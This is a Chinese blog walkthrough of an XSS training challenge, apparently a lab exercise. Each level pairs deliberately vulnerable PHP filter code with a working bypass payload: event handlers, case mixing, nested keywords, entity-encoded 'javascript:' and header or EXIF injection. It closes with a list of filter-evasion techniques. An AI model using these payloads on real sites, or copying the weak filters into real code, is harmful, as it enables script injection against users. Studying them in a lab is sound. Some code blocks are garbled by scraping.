2019-01-03-xss_challenge

1.第一题没啥拦截和编码,直接显示,源代码如下:

ini_set("display_errors", 0);
$str = $_GET["name"];
echo "欢迎用户".$str."";
payload:

2.第二题的源代码如下:

$str = $_GET["keyword"];
echo "没有找到和".htmlspecialchars($str)."相关的结果.
"."



payload:">"这是直接把前面标签闭合的意思

可以看到进行html特殊字符的编码,经过测试以后发现,浏览器进行所谓的URL编码,然后发送到服务器端解码以后进行HTML实体编码,对',",<,>,&符号进行编码,注意单引号编码不是默认的,然后返回前端被浏览器解析,还原成xss payload弹窗,所以这是html编码只能防范存储型漏洞的意思?

先看下去
3.第三题源码如下:

$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "没有找到和".htmlspecialchars($str)."相关的结果.
".'



payload: 123456' onfocus=alert(document.domain) autofocus//查了一下,网上说这个autofocus是当页面加载时自动获得焦点,然后onfocus是指定获得焦点时应该触发的事件.

显然是做了代替,去掉了所有的大于小于号,那就只能用事件触发了.
4.第四道同三
5.源代码如下:

$str = strtolower($_GET["keyword"]);
$str2=str_replace("没有找到和".htmlspecialchars($str)."相关的结果.".'



payload:1">
</code></pre> 
 <p>经测试,这道题目转换了script和on标签,那就嵌套或者伪协议</p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 512px; max-height: 162px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/604a15a67ad24381a98305c7c23d3c67.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/604a15a67ad24381a98305c7c23d3c67.jpg" width="512" height="162" alt="2019-01-03-xss_challenge_第4张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p4 
  </div> 
 </div> 
 <br> 
 <p>然后发现嵌套不行,因为这个是转换来着.....不是直接净化掉<br> 然后就是直接上伪协议了.</p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 438px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/e99136bc0a234f829ebeb564f6dfed6d.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/e99136bc0a234f829ebeb564f6dfed6d.jpg" width="650" height="330" alt="2019-01-03-xss_challenge_第5张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p5 
  </div> 
 </div> 
 <p>6.源代码如下:</p> 
 <pre><code>$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hRef=javascript:alert(1)>xss</a>>
</code></pre> 
 <p>这道题试了挺久,结果发现啥方法都不行,然后看了下答案,发现,我去,居然没做大小写转换...,直接大小写绕过就可以了.</p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 497px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/329bf3263ecc41128f9e5709e4985f50.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/329bf3263ecc41128f9e5709e4985f50.jpg" width="650" height="254" alt="2019-01-03-xss_challenge_第6张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p6 
  </div> 
 </div> 
 <br> 
 <p>7.源代码如下：</p> 
 <pre><code>$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
payload:1"><a hrhrefef=javasscriptcript:alert(1)>xss</a>>
</code></pre> 
 <p>主要尝试了以后发现script标签和href标签都不见，所以考虑嵌套的手段来绕过防护，最后使用<a>标签来完成</p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 491px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/d1b7b1dd14a2416dadf9c32e4e4f03bb.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/d1b7b1dd14a2416dadf9c32e4e4f03bb.jpg" width="650" height="271" alt="2019-01-03-xss_challenge_第7张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p7 
  </div> 
 </div> 
 <br> 
 <p>8.源代码如下：</p> 
 <pre><code>$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level7.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
payload:java&#115;cript:alert(1)
</code></pre> 
 <p>经过自己一波尝试，发现全部转小写了，然后是直接替换了，on,href,script等关键词语都被替换了，这种嵌套，伪协议，大小写全都失效了，只能看一波writeup,结果发现他是用编码绕过的，可以可以。。。。此处进行了html编码来绕过。</p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 482px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/d87db5500f13438da5cae9b48898c8d7.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/d87db5500f13438da5cae9b48898c8d7.jpg" width="650" height="241" alt="2019-01-03-xss_challenge_第8张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p8 
  </div> 
 </div> 
 <br> 
 <p>9.源代码如下：</p> 
 <pre><code>$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{echo '<center><BR><a href="您的链接不合法？有没有！">友情链接</a></center>';}
else{echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';}
?>
payload:javascrip&#116;:alert(1)//http://xxx.com
</code></pre> 
 <p>看源代码可知道其实它里面会检查有没有http://在字符串里面，如果没有的话就直接跳转不成功，然后净化是先小写，然后替换，所以还是采用Unicode编码来绕，接着直接后面带上http://,但是这里要使用//注释符，注释掉后面的http://,不然会不成功。</p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 422px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/b107b1906081427c85450c04d6da9f7e.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/b107b1906081427c85450c04d6da9f7e.jpg" width="650" height="232" alt="2019-01-03-xss_challenge_第9张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p9 
  </div> 
 </div> 
 <br> 
 <p>10.源代码如下：</p> 
 <pre><code>$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
payload:123456" onmouseover=alert(document.domain) type="text
</code></pre> 
 <p>第十题主要是要让挑战者学会看源代码，这次是看不到，所以你只能看到输入点，输出点是看不到的，需要手动把他找出来，这就需要找到hidden,在前端去掉之后把输出点找出来，这里的输出点是hidden,经实测t_link和t_history不是输出点，所以不能用<,>然后就只能用事件输出了，这里用onmmouseover来触发。</p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 539px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/0842efcfd76f4a47b8f93fb4b55d6422.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/0842efcfd76f4a47b8f93fb4b55d6422.jpg" width="650" height="291" alt="2019-01-03-xss_challenge_第10张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p10.jpg 
  </div> 
 </div> 
 <br> 
 <p>11.源代码如下所示：</p> 
 <pre><code>$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
payload:1" onmouseover=alert(1)
</code></pre> 
 <p>这道题目和前面差不多，直接把hidden menu找出来然后直接上事件触发就可以了。而其中这个hidden的值就是包头里面的referer字段，所以burp抓包也是一样的。</p> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 572px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/1304669dbd4243eaa832d90cb0e9a199.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/1304669dbd4243eaa832d90cb0e9a199.jpg" width="650" height="334" alt="2019-01-03-xss_challenge_第11张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p11 
  </div> 
 </div> 
 <p>12.这道题目也是隐藏键值，然后改了user-agent的值插入xss代码.</p> 
 <pre><code><input name="t_ua" value="Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" type="hidden">
修改为：
<input name="t_ua" value="1" onmouseover=alert(1)>
</code></pre> 
 <p></p> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 616px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/48922dc90c484672af05abdb4f37e700.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/48922dc90c484672af05abdb4f37e700.jpg" width="650" height="394" alt="2019-01-03-xss_challenge_第12张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p12 
  </div> 
 </div> 
 <br> 这里介绍一下wooyun上面一个上传新思路，通过上传图片修改图片exif信息插入xss代码，平台在查看xss代码的时候就可以直接执行了。 
 <br> https://bugs.shuimugan.com/bug/view?bug_no=194934 
 <br> 13.如上： 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 567px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/58c169031b804c4d8872134edc8b47b8.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/58c169031b804c4d8872134edc8b47b8.jpg" width="650" height="347" alt="2019-01-03-xss_challenge_第13张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p13 
  </div> 
 </div> 
 <br> 14.该题目为cookie注入xss代码，如下： 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 503px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/ad06a9891a784b6f909bdce5760b22a7.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/ad06a9891a784b6f909bdce5760b22a7.jpg" width="650" height="317" alt="2019-01-03-xss_challenge_第14张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p14 
  </div> 
 </div> 
 <br> 15.这道题目主要是让人学习一波图片上传插入xss代码的思路，主要是学习利用exiftool改变图片的exif信息即可。Kali中安装了exiftool以后直接查看并修改插入，上传以后如果网站程序会查看图片exif信息的话那就会执行这些代码了。 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 52px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/0b7dacc8159148e7a1d677b04048609c.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/0b7dacc8159148e7a1d677b04048609c.jpg" width="650" height="37"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p15 
  </div> 
 </div> 
 <br> 
 <div class="image-package"> 
  <div class="image-container" style="max-width: 700px; max-height: 455px;"> 
   <div class="image-view"> 
    <a href="http://img.e-com-net.com/image/info10/d2ec097d76cb4775a2331e6c09eeb6cc.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info10/d2ec097d76cb4775a2331e6c09eeb6cc.jpg" width="650" height="268" alt="2019-01-03-xss_challenge_第15张图片" style="border:1px solid black;"></a> 
   </div> 
  </div> 
  <div class="image-caption">
    p16 
  </div> 
 </div> 
 <br> 确实是一个很骚的思路来着。。。。 
 <p></p> 
 <p>整理一下xss绕过防护的思路：<br> 1.大小写绕过，如果过滤了一些关键词，比如script等，直接大小写试试，对应的解决方案就是直接将输入转小写，解决。<br> 2.伪协议，即利用一些标签，如img, iframe,a href等等，eg:<iframe src=javascript:alert(1)>,对应防御伪协议可以直接过滤掉所谓的一些伪协议标签就可以了。<br> 3.嵌套，用于和大小写绕过一样的防护情况。。。<br> 4.事件触发，这样可以处理一些过滤<,>等情况，例如onmouseover，onfocus等，过滤on可解决。<br> 5.善于利用注释符号，注释一些信息。<br> 6.编码绕过，例如stringformcharcode,html编码绕过等等。<br> 7.上传图片含有xss代码的exif信息</p> 
</article>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1408264473814335488"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(2019-01-03-xss_challenge)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1408264473814335488.htm"
                           title="2019-01-03-xss_challenge" target="_blank">2019-01-03-xss_challenge</a>
                        <span class="text-muted">最初的美好_kai</span>

                        <div>1.第一题没啥拦截和编码,直接显示,源代码如下:ini_set("display_errors",0);$str=$_GET["name"];echo"欢迎用户".$str."";payload:alert(1)p1p22.第二题的源代码如下:$str=$_GET["keyword"];echo"没有找到和".htmlspecialchars($str)."相关的结果."."payload:">a</div>
                    </li>
                                <li><a href="/article/6.htm"
                                       title="[黑洞与暗粒子]没有光的世界" target="_blank">[黑洞与暗粒子]没有光的世界</a>
                                    <span class="text-muted">comsci</span>

                                    <div>&nbsp;&nbsp;&nbsp;&nbsp; 无论是相对论还是其它现代物理学,都显然有个缺陷,那就是必须有光才能够计算 
 
&nbsp;&nbsp;&nbsp;&nbsp; 但是,我相信,在我们的世界和宇宙平面中,肯定存在没有光的世界.... 
 
&nbsp;&nbsp;&nbsp;&nbsp; 那么,在没有光的世界,光子和其它粒子的规律无法被应用和考察,那么以光速为核心的 
 
&nbs</div>
                                </li>
                                <li><a href="/article/133.htm"
                                       title="jQuery Lazy Load 图片延迟加载" target="_blank">jQuery Lazy Load 图片延迟加载</a>
                                    <span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a>
                                    <div>基于 jQuery 的图片延迟加载插件，在用户滚动页面到图片之后才进行加载。 
对于有较多的图片的网页，使用图片延迟加载，能有效的提高页面加载速度。 
 
 版本： 
 

  jQuery v1.4.4+ 
 

  jQuery Lazy Load v1.7.2 
 
 
 注意事项： 
 
 
 需要真正实现图片延迟加载，必须将真实图片地址写在 data-original 属性中。若 src</div>
                                </li>
                                <li><a href="/article/260.htm"
                                       title="使用Jodd的优点" target="_blank">使用Jodd的优点</a>
                                    <span class="text-muted">Kai_Ge</span>
<a class="tag" taget="_blank" href="/search/jodd/1.htm">jodd</a>
                                    <div>1. &nbsp;简化和统一 controller ，抛弃 extends SimpleFormController ，统一使用 implements Controller 的方式。 
2. &nbsp;简化 JSP 页面的 bind, 不需要一个字段一个字段的绑定。 
3. &nbsp;对 bean 没有任何要求，可以使用任意的 bean 做为 formBean。 
&nbsp; 
使用方法简介</div>
                                </li>
                                <li><a href="/article/387.htm"
                                       title="jpa Query转hibernate Query" target="_blank">jpa Query转hibernate Query</a>
                                    <span class="text-muted">120153216</span>
<a class="tag" taget="_blank" href="/search/Hibernate/1.htm">Hibernate</a>
                                    <div>public List&lt;Map&gt; getMapList(String hql,
			Map map) {
		org.hibernate.Query jpaQuery = entityManager.createQuery(hql);
		if (null != map) {
			for (String parameter : map.keySet()) {
				jp</div>
                                </li>
                                <li><a href="/article/514.htm"
                                       title="Django_Python3添加MySQL/MariaDB支持" target="_blank">Django_Python3添加MySQL/MariaDB支持</a>
                                    <span class="text-muted">2002wmj</span>
<a class="tag" taget="_blank" href="/search/mariaDB/1.htm">mariaDB</a>
                                    <div>现状 
首先，Django@Python2.x 中默认的引擎为 django.db.backends.mysql 。但是在Python3中如果这样写的话，会发现 django.db.backends.mysql 依赖 MySQLdb[5] ，而 MySQLdb 又不兼容 Python3 于是要找一种新的方式来继续使用MySQL。 MySQL官方的方案 
首先据MySQL文档[3]说，自从MySQL</div>
                                </li>
                                <li><a href="/article/641.htm"
                                       title="在SQLSERVER中查找消耗IO最多的SQL" target="_blank">在SQLSERVER中查找消耗IO最多的SQL</a>
                                    <span class="text-muted">357029540</span>
<a class="tag" taget="_blank" href="/search/SQL+Server/1.htm">SQL Server</a>
                                    <div>返回做IO数目最多的50条语句以及它们的执行计划。 
select top 50&nbsp;&nbsp; 
 
(total_logical_reads/execution_count) as avg_logical_reads,&nbsp; 
 
(total_logical_writes/execution_count) as avg_logical_writes,&nbsp; 
 
(tot</div>
                                </li>
                                <li><a href="/article/768.htm"
                                       title="spring UnChecked 异常 官方定义！" target="_blank">spring UnChecked 异常 官方定义！</a>
                                    <span class="text-muted">7454103</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
                                    <div>&nbsp; 如果你接触过spring的 事物管理！那么你必须明白 spring的 非捕获异常！ 即 unchecked 异常！ 因为 spring 默认这类异常事物自动回滚！！ 
 
 
 
 
public static boolean isCheckedException(Throwable ex)
    {
   return !(ex instanceof RuntimeExcep</div>
                                </li>
                                <li><a href="/article/895.htm"
                                       title="mongoDB 入门指南、示例" target="_blank">mongoDB 入门指南、示例</a>
                                    <span class="text-muted">adminjun</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a><a class="tag" taget="_blank" href="/search/%E6%93%8D%E4%BD%9C/1.htm">操作</a>
                                    <div>一、准备工作 
1、 下载mongoDB 
下载地址：http://www.mongodb.org/downloads 
选择合适你的版本 
相关文档：http://www.mongodb.org/display/DOCS/Tutorial 
2、 安装mongoDB 
A、 不解压模式： 
将下载下来的mongoDB-xxx.zip打开，找到bin目录，运行mongod.exe就可以启动服务，默</div>
                                </li>
                                <li><a href="/article/1022.htm"
                                       title="CUDA 5 Release Candidate Now Available" target="_blank">CUDA 5 Release Candidate Now Available</a>
                                    <span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/CUDA/1.htm">CUDA</a>
                                    <div>The CUDA 5 Release Candidate is now available at&nbsp;http://developer.nvidia.com/&lt;wbr&gt;&lt;/wbr&gt;cuda/cuda-pre-production. Now applicable to a broader set of algorithms, CUDA 5 has advanced fe</div>
                                </li>
                                <li><a href="/article/1149.htm"
                                       title="Essential Studio for WinRT网格控件测评" target="_blank">Essential Studio for WinRT网格控件测评</a>
                                    <span class="text-muted">Axiba</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/html5/1.htm">html5</a>
                                    <div>Essential Studio for WinRT界面控件包含了商业平板应用程序开发中所需的所有控件，如市场上运行速度最快的grid 和chart、地图、RDL报表查看器、丰富的文本查看器及图表等等。同时，该控件还包含了一组独特的库，用于从WinRT应用程序中生成Excel、Word以及PDF格式的文件。此文将对其另外一个强大的控件——网格控件进行专门的测评详述。 
 
 
网格控件功能 
1、</div>
                                </li>
                                <li><a href="/article/1276.htm"
                                       title="java 获取windows系统安装的证书或证书链" target="_blank">java 获取windows系统安装的证书或证书链</a>
                                    <span class="text-muted">bewithme</span>
<a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a>
                                    <div>&nbsp; 
&nbsp;&nbsp;&nbsp; 有时需要获取windows系统安装的证书或证书链，比如说你要通过证书来创建java的密钥库&nbsp; 。 
有关证书链的解释可以查看此处 。 
&nbsp; 
public static void main(String[] args) {
		SunMSCAPI providerMSCAPI = new SunMSCAPI();
		S</div>
                                </li>
                                <li><a href="/article/1403.htm"
                                       title="NoSQL数据库之Redis数据库管理(set类型和zset类型)" target="_blank">NoSQL数据库之Redis数据库管理(set类型和zset类型)</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/NoSQL/1.htm">NoSQL</a>
                                    <div>4.sets类型 
&nbsp; &nbsp; &nbsp; &nbsp; Set是集合，它是string类型的无序集合。set是通过hash table实现的，添加、删除和查找的复杂度都是O(1)。对集合我们可以取并集、交集、差集。通过这些操作我们可以实现sns中的好友推荐和blog的tag功能。 
&nbsp; &nbsp; &nbsp; &nbsp; sadd：向名称为key的set中添加元</div>
                                </li>
                                <li><a href="/article/1530.htm"
                                       title="异常捕获何时用Exception，何时用Throwable" target="_blank">异常捕获何时用Exception，何时用Throwable</a>
                                    <span class="text-muted">bingyingao</span>

                                    <div>用Exception的情况 
 try { 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //可能发生空指针、数组溢出等异常 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; } catch (Exception e) { 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp</div>
                                </li>
                                <li><a href="/article/1657.htm"
                                       title="【Kafka四】Kakfa伪分布式安装" target="_blank">【Kafka四】Kakfa伪分布式安装</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a>
                                    <div>在http://bit1129.iteye.com/blog/2174791一文中，实现了单Kafka服务器的安装，在Kafka中，每个Kafka服务器称为一个broker。本文简单介绍下，在单机环境下Kafka的伪分布式安装和测试验证 &nbsp; 1. 安装步骤 
&nbsp; 
Kafka伪分布式安装的思路跟Zookeeper的伪分布式安装思路完全一样，不过比Zookeeper稍微简单些(不</div>
                                </li>
                                <li><a href="/article/1784.htm"
                                       title="Project Euler" target="_blank">Project Euler</a>
                                    <span class="text-muted">bookjovi</span>
<a class="tag" taget="_blank" href="/search/haskell/1.htm">haskell</a>
                                    <div>Project Euler是个数学问题求解网站，网站设计的很有意思，有很多problem，在未提交正确答案前不能查看problem的overview，也不能查看关于problem的discussion thread，只能看到现在problem已经被多少人解决了，人数越多往往代表问题越容易。 
&nbsp; &nbsp; 看看problem 1吧： 
 Add all the natural num</div>
                                </li>
                                <li><a href="/article/1911.htm"
                                       title="Java-Collections Framework学习与总结-ArrayDeque" target="_blank">Java-Collections Framework学习与总结-ArrayDeque</a>
                                    <span class="text-muted">BrokenDreams</span>
<a class="tag" taget="_blank" href="/search/Collections/1.htm">Collections</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 表、栈和队列是三种基本的数据结构，前面总结的ArrayList和LinkedList可以作为任意一种数据结构来使用，当然由于实现方式的不同，操作的效率也会不同。 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 这篇要看一下java.util.ArrayDeque。从命名上看</div>
                                </li>
                                <li><a href="/article/2038.htm"
                                       title="读《研磨设计模式》-代码笔记-装饰模式-Decorator" target="_blank">读《研磨设计模式》-代码笔记-装饰模式-Decorator</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>声明： 本文只为方便我个人查阅和理解，详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ 
 
 



import java.io.BufferedOutputStream;
import java.io.DataOutputStream;
import java.io.FileOutputStream;
import java.io.Fi</div>
                                </li>
                                <li><a href="/article/2165.htm"
                                       title="Maven学习(一)" target="_blank">Maven学习(一)</a>
                                    <span class="text-muted">chenyu19891124</span>
<a class="tag" taget="_blank" href="/search/Maven%E7%A7%81%E6%9C%8D/1.htm">Maven私服</a>
                                    <div>&nbsp; &nbsp; 学习一门技术和工具总得花费一段时间，5月底6月初自己学习了一些工具，maven+Hudson+nexus的搭建，对于maven以前只是听说，顺便再自己的电脑上搭建了一个maven环境，但是完全不了解maven这一强大的构建工具，还有ant也是一个构建工具，但ant就没有maven那么的简单方便，其实简单点说maven是一个运用命令行就能完成构建，测试，打包，发布一系列功</div>
                                </li>
                                <li><a href="/article/2292.htm"
                                       title="[原创]JWFD工作流引擎设计----节点匹配搜索算法(用于初步解决条件异步汇聚问题) 补充" target="_blank">[原创]JWFD工作流引擎设计----节点匹配搜索算法(用于初步解决条件异步汇聚问题) 补充</a>
                                    <span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E/1.htm">搜索引擎</a><a class="tag" taget="_blank" href="/search/%E5%B5%8C%E5%85%A5%E5%BC%8F/1.htm">嵌入式</a>
                                    <div>本文主要介绍在JWFD工作流引擎设计中遇到的一个实际问题的解决方案，请参考我的博文&quot;带条件选择的并行汇聚路由问题&quot;中图例A2描述的情况(http://comsci.iteye.com/blog/339756),我现在把我对图例A2的一个解决方案公布出来，请大家多指点 
 
 节点匹配搜索算法(用于解决标准对称流程图条件汇聚点运行控制参数的算法) 
 
 需要解决的问题：已知分支</div>
                                </li>
                                <li><a href="/article/2419.htm"
                                       title="Linux中用shell获取昨天、明天或多天前的日期" target="_blank">Linux中用shell获取昨天、明天或多天前的日期</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a><a class="tag" taget="_blank" href="/search/%E4%B8%8A%E5%87%A0%E5%B9%B4/1.htm">上几年</a><a class="tag" taget="_blank" href="/search/%E6%98%A8%E5%A4%A9/1.htm">昨天</a><a class="tag" taget="_blank" href="/search/%E8%8E%B7%E5%8F%96%E4%B8%8A%E5%87%A0%E4%B8%AA%E6%9C%88/1.htm">获取上几个月</a>
                                    <div>在Linux中可以通过date命令获取昨天、明天、上个月、下个月、上一年和下一年 
 
 
# 获取昨天 
date -d 'yesterday'&nbsp; # 或 date -d 'last day' 
# 获取明天 
date -d 'tomorrow'&nbsp;&nbsp; # 或 date -d 'next day' 
# 获取上个月 
date -d 'last month' 
# </div>
                                </li>
                                <li><a href="/article/2546.htm"
                                       title="我所理解的云计算" target="_blank">我所理解的云计算</a>
                                    <span class="text-muted">dongwei_6688</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97/1.htm">云计算</a>
                                    <div>&nbsp;&nbsp; &nbsp; &nbsp;在刚开始接触到一个概念时，人们往往都会去探寻这个概念的含义，以达到对其有一个感性的认知，在Wikipedia上关于“云计算”是这么定义的，它说： 
 
 &nbsp; &nbsp; &nbsp; &nbsp;Cloud computing is a phrase used to describe a variety of computing co</div>
                                </li>
                                <li><a href="/article/2673.htm"
                                       title="YII CMenu配置" target="_blank">YII CMenu配置</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/yii/1.htm">yii</a>
                                    <div>Adding id and class names to CMenu 
We use the id and htmlOptions to accomplish this. Watch.   
//in your view
$this-&gt;widget('zii.widgets.CMenu', array(
	'id'=&gt;'myMenu',
